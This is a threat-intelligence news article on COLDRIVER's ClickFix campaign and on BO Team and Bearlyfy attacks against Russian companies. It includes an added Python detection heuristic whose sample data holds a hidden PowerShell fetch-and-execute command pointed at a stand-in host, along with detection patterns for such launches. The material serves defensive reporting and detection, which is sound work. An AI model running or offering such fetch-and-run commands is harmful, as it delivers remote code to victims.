New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks

By Team-CWD, October 6, 2025


The Russian advanced persistent threat (APT) group known as COLDRIVER has been attributed to a fresh round of ClickFix-style attacks designed to deliver two new “lightweight” malware families tracked as BAITSWITCH and SIMPLEFIX.

Zscaler ThreatLabz, which detected the new multi-stage ClickFix campaign earlier this month, described BAITSWITCH as a downloader that ultimately drops SIMPLEFIX, a PowerShell backdoor.

COLDRIVER, also tracked as Callisto, Star Blizzard, and UNC4057, is the moniker assigned to a Russia-linked threat actor that’s known to target a wide range of sectors since 2019. While early campaign waves were observed using spear-phishing lures to direct targets to credential harvesting pages, the group has been fleshing out its arsenal with custom tools like SPICA and LOSTKEYS, which underscores its technical sophistication.

The adversary’s use of ClickFix tactics was previously documented by the Google Threat Intelligence Group (GTIG) back in May 2025, using fake sites serving fake CAPTCHA verification prompts to trick the victim into executing a PowerShell command that’s designed to deliver the LOSTKEYS Visual Basic Script.

“The continued use of ClickFix suggests that it is an effective infection vector, even if it is neither novel nor technically advanced,” Zscaler security researchers Sudeep Singh and Yin Hong Chang said in a report published this week.

The latest attack chain follows the same modus operandi, tricking unsuspecting users into running a malicious DLL in the Windows Run dialog under the guise of completing a CAPTCHA check. The DLL, BAITSWITCH, reaches out to an attacker-controlled domain (“captchanom[.]top”) to fetch the SIMPLEFIX backdoor, while a decoy document hosted on Google Drive is presented to the victims.

It also makes several HTTP requests to the same server to send system information, receive commands that establish persistence, store encrypted payloads in the Windows Registry, download a PowerShell stager, and clear the most recent command executed in the Run dialog, effectively erasing traces of the ClickFix attack that triggered the infection.

The downloaded PowerShell stager subsequently reaches out to an external server (“southprovesolutions[.]com”) to download SIMPLEFIX, which, in turn, establishes communication with a command-and-control (C2) server to run PowerShell scripts, commands, and binaries hosted on remote URLs.

One of the PowerShell scripts executed via SIMPLEFIX exfiltrates information about a hard-coded list of file types found in a pre-configured list of directories. The directories and file extensions scanned overlap with those targeted by LOSTKEYS.
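The chain above begins with a command the victim types into the Run dialog and later wipes that dialog's history, so process-creation telemetry (a script host spawned by explorer.exe) is the more durable place to detect it. As an added example that is not code from Zscaler or the original article, this Python heuristic flags Run-dialog launches of common script hosts whose command lines carry ClickFix-style traits; the sample events, the rundll32 invocation and the domain `captcha.example` are constructed assumptions, since the article does not state how the DLL is invoked.

```python
import re
# Constructed sample process-creation events (parent/image/command line, as Sysmon Event ID 1 exposes); not real telemetry.
SAMPLE_EVENTS = [
    # ClickFix via Run dialog: explorer.exe spawns rundll32 loading a DLL from a user directory
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\u\AppData\Local\Temp\verify.dll,Start"},
    # ClickFix via Run dialog: hidden PowerShell fetching a stager from a constructed URL
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://captcha.example/x | iex"'},
    # Benign: user opens Notepad from the Run dialog
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    # Benign: admin starts an interactive PowerShell from the Run dialog (no suspicious flags)
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell"},
    # Not a Run-dialog launch: parent is a terminal, not explorer.exe
    {"parent": r"C:\Program Files\Git\git-bash.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Date"},
]

# Script hosts and loaders a ClickFix lure typically has the victim type into the Run dialog.
RUN_DIALOG_LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}

SUSPICIOUS_PATTERNS = {
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "inline_eval": re.compile(r"\biex\b|invoke-expression", re.I),
    "dll_from_user_dir": re.compile(r"\\(?:Temp|Downloads|AppData)\\.*\.dll", re.I),
    "dll_export_call": re.compile(r"\.dll,\w+", re.I),
}

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> list[str]:
    """Reasons an event looks like a Run-dialog ClickFix execution; empty list if none."""
    # Commands typed into the Run dialog are spawned by explorer.exe. Process telemetry survives
    # the malware wiping the dialog's history key (HKCU\...\Explorer\RunMRU), so key on it.
    if _basename(event["parent"]) != "explorer.exe" or _basename(event["image"]) not in RUN_DIALOG_LOLBINS:
        return []
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(event["cmdline"])]

def find_clickfix_candidates(events: list[dict]) -> list[tuple[str, list[str]]]:
    # Pair each flagged command line with the pattern names it matched.
    return [(e["cmdline"], reasons) for e in events if (reasons := classify(e))]

if __name__ == "__main__":
    for cmdline, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"[ClickFix candidate] {cmdline!r}: {', '.join(reasons)}")
```

Only the two lure-style launches are flagged; the interactive PowerShell and the terminal-spawned one pass, which keeps the rule usable on hosts where admins legitimately use the Run dialog.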

“The COLDRIVER APT group is known for targeting members of NGOs, human rights defenders, think tanks in Western regions, as well as individuals exiled from and residing in Russia,” Zscaler said. “The focus of this campaign closely aligns with their victimology, which targets members of civil society connected to Russia.”

BO Team and Bearlyfy Target Russia

The development comes as Kaspersky said it observed a new phishing campaign targeting Russian companies in early September undertaken by the BO Team group (aka Black Owl, Hoody Hyena, and Lifting Zmiy) using password-protected RAR archives to deliver a new version of BrockenDoor rewritten in C# and an updated version of ZeronetKit.

ZeronetKit, a Golang backdoor, comes fitted with capabilities to provide remote access to compromised hosts, upload and download files, execute commands using cmd.exe, and create a TCP/IPv4 tunnel. Select newer versions also add support for downloading and running shellcode, updating the C2 communication interval, and modifying the C2 server list.

“ZeronetKit is unable to independently persist on an infected system, so attackers use BrockenDoor to copy the downloaded backdoor to startup,” the Russian cybersecurity vendor said.

It also follows the emergence of a new group called Bearlyfy that has used ransomware strains like LockBit 3.0 and Babuk in attacks targeting Russia, initially attacking smaller companies for smaller ransoms before graduating to bigger firms in the country starting April 2025, according to F6. As of August 2025, the group is estimated to have claimed at least 30 victims.

In one incident targeting a consulting company, the threat actors have been observed weaponizing a vulnerable version of Bitrix for initial access, followed by using the Zerologon flaw to escalate privileges. In another case observed in July, the initial access is said to have been facilitated through an unnamed partner company.

“In the most recent recorded attack, the attackers demanded €80,000 in cryptocurrency, while in the first attack, the ransom was several thousand dollars,” F6 researchers said. “Due to the relatively low ransom amounts, on average, every fifth victim buys decryptors from the attackers.”

Bearlyfy is assessed to have been active since January 2025, and a deeper analysis of its tools uncovered infrastructure overlaps with a likely pro-Ukrainian threat group called PhantomCore, which has a track record of targeting Russian and Belarusian companies since 2022. Despite these similarities, Bearlyfy is believed to be an autonomous entity.

“PhantomCore implements complex, multi-stage attacks typical of APT campaigns,” the company said. “Bearlyfy, on the other hand, uses a different model: attacks with minimal preparation and a targeted focus on achieving an immediate effect. Initial access is achieved through exploitation of external services and vulnerable applications. The primary toolkit is aimed at encryption, destruction, or modification of data.”
